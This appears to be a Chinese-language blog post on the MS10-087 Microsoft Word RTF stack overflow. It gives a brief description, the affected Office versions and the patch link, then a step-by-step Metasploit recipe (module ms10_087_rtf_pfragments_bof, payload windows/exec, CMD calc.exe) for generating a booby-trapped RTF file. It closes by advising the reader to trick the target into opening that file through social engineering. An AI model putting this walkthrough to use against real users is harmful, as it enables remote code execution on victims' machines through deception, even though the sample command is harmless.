MS10-087漏洞

1706人浏览 / 0人评论

一、漏洞简介

Word是微软Office套件中的文字处理工具。

在处理RTF文档中的特定控制字时Word未经执行长度检查便将其属性字符串拷贝到了栈缓冲区中,这可能触发栈溢出。成功利用此漏洞的攻击者可以完全控制受影响的系统。

Microsoft Office XP SP3 Microsoft Office for Mac 2011 Microsoft Office 2010 Microsoft Office 2008 for Mac Microsoft Office 2007 SP2 Microsoft Office 2004 for Mac Microsoft Office 2003 Service Pack 3 临时解决方法:

  • 不要打开或保存从不受信任来源或从受信任来源意外收到的Microsoft Office文件。

厂商补丁:

Microsoft

Microsoft已经为此发布了一个安全公告(MS10-087)以及相应补丁: MS10-087:Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (2423930) 链接:http://www.microsoft.com/technet/security/bulletin/MS10-087.mspx?pf=true

二、 漏洞复原

1、搜索漏洞

search rtf

2、进入漏洞

 use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof

3、 查看用法

 show options 

4、 设置word文件名

set FILENAME liangzeyu.rtf

5、设置payload

 set payload windows/exec 

6、 设置主机攻击命令

set CMD calc.exe    

7、运行

run 

8、将生成的文件利用社工让攻击端打开即可 

全部评论